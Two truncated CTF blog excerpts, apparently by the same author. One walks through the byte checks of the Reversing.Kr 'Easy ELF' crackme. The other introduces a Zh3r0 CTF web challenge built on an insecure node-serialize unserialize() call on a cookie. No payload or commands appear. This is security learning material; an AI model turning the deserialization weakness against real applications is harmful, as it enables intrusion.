Vighnesh Raje

  Let’s begin with the main function. So firstly, the string “Reversing.Kr Easy ELF\n\n” defined in the .data section is printed to stdout. Further, we can see two function calls – sub_8048434 and sub_8048451. Finally, the return value of function sub_8048451 is checked. If the return value is false, string “Wrong\n” is printed to stdout. Let’s now proceed to check function sub_8048434. This function reads an input of type string and stores it at address starting from 0x804A020 using “scanf”. As a test scenario let’s consider our input is “xxxxxxx”. Moving ahead to function sub_8048451. Here we have a series of checks in place. If all the checks are passed, the function returns true or else false. So now let’s analyze each check individually. In the first case, the 2nd byte of the input is checked to verify weather it is “1”. So now we know, the correct key should be something like “x1xxx..”   Then, in the second case, its checks if the 5 th byte of the input ...

After participating in Zh3r0 CTF last year(2020), I thought the CTF had some really cool challenges and so thought of looking at few of the challenges this year too. So, lets just jump straight  into the technical write-up. In this blog, I would be describing my methodology for sparta - 100, which was an easy challenge in web category. The challenge provided with source code along with a Dockerfile for hosting the web application locally. Looking at the source file, it was clear that express/node js was used at the back-end. Looking at the server code, one could see that there is a check to see if "guest" token is passed in cookie. If so, the value of guest token is passed to unserialize() of node-serialize module. That's it! we are talking about a node de-serialization vulnerability here. If the guest token is not part of the cookie, the application would take username, country and city values from the request body and will create a base64 encoded json object. This is...